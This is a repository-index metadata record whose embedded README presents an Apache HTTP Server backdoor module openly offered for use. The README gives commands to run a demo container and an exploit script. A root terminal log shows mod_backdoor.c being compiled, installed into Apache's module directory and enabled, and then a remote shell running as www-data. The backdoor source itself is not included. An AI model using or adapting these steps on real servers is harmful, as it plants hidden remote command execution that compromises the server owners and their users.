{"id":19261456,"url":"https://github.com/wangyihang/apache-http-server-module-backdoor","last_synced_at":"2025-09-08T09:33:19.917Z","repository":{"id":113353435,"uuid":"111896963","full_name":"WangYihang/Apache-HTTP-Server-Module-Backdoor","owner":"WangYihang","description":":japanese_goblin: A Simple Backdoor For Apache HTTP Server","archived":false,"fork":false,"pushed_at":"2024-08-28T03:46:39.000Z","size":28,"stargazers_count":154,"open_issues_count":0,"forks_count":37,"subscribers_count":7,"default_branch":"main","last_synced_at":"2025-03-02T02:12:11.616Z","etag":null,"topics":["apache2","backdoor","backdoorweb","cybersecurity"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/WangYihang.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-11-24T08:54:53.000Z","updated_at":"2025-02-21T16:51:36.000Z","dependencies_parsed_at":null,"dependency_job_id":"ca7104af-e5f6-4ec9-a6dc-a97e9d1f250c","html_url":"https://github.com/WangYihang/Apache-HTTP-Server-Module-Backdoor","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/WangYihang%2FApache-HTTP-Server-Module-Backdoor","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/WangYihang%2FApache-HTTP-Server-Module-Backdoor/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/WangYihang%2FApache-HTTP-Server-Module-Backdoor/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/WangYihang%2FApache-HTTP-Server-Module-Backdoor/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/WangYihang","download_url":"https://codeload.github.com/WangYihang/Apache-HTTP-Server-Module-Backdoor/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244066179,"owners_count":20392406,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["apache2","backdoor","backdoorweb","cybersecurity"],"created_at":"2024-11-09T19:27:04.198Z","updated_at":"2025-03-17T16:09:52.775Z","avatar_url":"https://github.com/WangYihang.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Backdoor for Apache HTTP Server\n\n## Getting Started\n\nStarting the exploited demo server in Docker\n\n```bash\ndocker run \\\n  --rm \\\n  --interactive \\\n  --detach \\\n  --tty \\\n  -p \\\n  4444:80 \\\n  ghcr.io/wangyihang/apache-http-server-module-backdoor:master\n```\n\nRun the exploit script\n\n```bash\npython exploit.py 127.0.0.1 4444\n```\n\nExample:\n```\nroot@kali:~/backdoor# apxs -i -a -c mod_backdoor.c \u0026\u0026 service apache2 restart\n/usr/share/apr-1.0/build/libtool  --mode=compile --tag=disable-static x86_64-linux-gnu-gcc -prefer-pic -pipe -g -O2 -fstack-protector-strong -Wformat -Werror=format-security  -Wdate-time -D_FORTIFY_SOURCE=2   -DLINUX -D_REENTRANT -D_GNU_SOURCE  -pthread  -I/usr/include/apache2  -I/usr/include/apr-1.0   -I/usr/include/apr-1.0 -I/usr/include  -c -o mod_backdoor.lo mod_backdoor.c \u0026\u0026 touch mod_backdoor.slo\nlibtool: compile:  x86_64-linux-gnu-gcc -pipe -g -O2 -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -DLINUX -D_REENTRANT -D_GNU_SOURCE -pthread -I/usr/include/apache2 -I/usr/include/apr-1.0 -I/usr/include/apr-1.0 -I/usr/include -c mod_backdoor.c  -fPIC -DPIC -o .libs/mod_backdoor.o\n/usr/share/apr-1.0/build/libtool  --mode=link --tag=disable-static x86_64-linux-gnu-gcc -Wl,--as-needed -Wl,-z,relro -Wl,-z,now    -o mod_backdoor.la  -rpath /usr/lib/apache2/modules -module -avoid-version    mod_backdoor.lo\nlibtool: link: rm -fr  .libs/mod_backdoor.la .libs/mod_backdoor.lai .libs/mod_backdoor.so\nlibtool: link: x86_64-linux-gnu-gcc -shared  -fPIC -DPIC  .libs/mod_backdoor.o    -Wl,--as-needed -Wl,-z -Wl,relro -Wl,-z -Wl,now   -Wl,-soname -Wl,mod_backdoor.so -o .libs/mod_backdoor.so\nlibtool: link: ( cd \".libs\" \u0026\u0026 rm -f \"mod_backdoor.la\" \u0026\u0026 ln -s \"../mod_backdoor.la\" \"mod_backdoor.la\" )\n/usr/share/apache2/build/instdso.sh SH_LIBTOOL='/usr/share/apr-1.0/build/libtool' mod_backdoor.la /usr/lib/apache2/modules\n/usr/share/apr-1.0/build/libtool --mode=install install mod_backdoor.la /usr/lib/apache2/modules/\nlibtool: install: install .libs/mod_backdoor.so /usr/lib/apache2/modules/mod_backdoor.so\nlibtool: install: install .libs/mod_backdoor.lai /usr/lib/apache2/modules/mod_backdoor.la\nlibtool: finish: PATH=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/sbin\" ldconfig -n /usr/lib/apache2/modules\n----------------------------------------------------------------------\nLibraries have been installed in:\n   /usr/lib/apache2/modules\n\nIf you ever happen to want to link against installed libraries\nin a given directory, LIBDIR, you must either use libtool, and\nspecify the full pathname of the library, or use the '-LLIBDIR'\nflag during linking and do at least one of the following:\n   - add LIBDIR to the 'LD_LIBRARY_PATH' environment variable\n     during execution\n   - add LIBDIR to the 'LD_RUN_PATH' environment variable\n     during linking\n   - use the '-Wl,-rpath -Wl,LIBDIR' linker flag\n   - have your system administrator add LIBDIR to '/etc/ld.so.conf'\n\nSee any operating system documentation about shared libraries for\nmore information, such as the ld(1) and ld.so(8) manual pages.\n----------------------------------------------------------------------\nchmod 644 /usr/lib/apache2/modules/mod_backdoor.so\n[preparing module `backdoor' in /etc/apache2/mods-available/backdoor.load]\nModule backdoor already enabled\nroot@kali:~/backdoor# python exploit.py 127.0.0.1 80\n$ whoami\nwww-data\n\n$ uname -a\nLinux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2 (2017-11-08) x86_64 GNU/Linux\n\n$ exit\n\n```\n\nLicense\n```\nTHE DRINKWARE LICENSE\n\n\u003cwangyihanger@gmail.com\u003e wrote this file. As long as \nyou retain this notice you can do whatever you want \nwith this stuff. If we meet some day, and you think \nthis stuff is worth it, you can buy me the following\ndrink(s) in return.\n\nRed Bull\nJDB\nCoffee\nSprite\nCola\nHarbin Beer\netc\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fwangyihang%2Fapache-http-server-module-backdoor","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fwangyihang%2Fapache-http-server-module-backdoor","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fwangyihang%2Fapache-http-server-module-backdoor/lists"}